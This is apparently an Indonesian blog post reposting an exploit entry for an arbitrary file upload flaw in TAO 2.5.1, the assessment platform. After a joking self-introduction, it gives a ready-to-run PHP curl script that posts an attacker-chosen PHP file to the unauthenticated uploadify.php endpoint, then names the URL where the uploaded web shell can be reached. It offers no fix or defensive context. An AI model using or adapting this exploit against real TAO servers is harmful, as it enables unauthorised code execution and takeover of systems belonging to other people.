TAO 2.5.1 Arbitrary File Upload Vulnerability

Hay para jomblo, kali ini orang paling ganteng sedunia
siapa lagi kalo bukan nabil muztahid,
akan share tentang exploit langsung aja ya lu liat dibawah ini exploit nya :)

 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
# Exploit Title: TAO 2.5.1 Arbitrary File Upload Vulnerability
# Author: DaOne aka MockingBird
# Vendor Homepage: http://taotesting.com/
# Download link: http://taotesting.com/resources/download-tao
# Category: webapps/php
# Google dork: n/a :p
------------------------------------------------------------------------

# Exploit
<?php
$uploadfile="yourfile.php";
$ch = curl_init("http://localhost/tao/views/js/jquery.uploadify/uploadify.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
        array('Filedata'=>"@$uploadfile"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>

 # Shell path: http://localhost/{filename}.php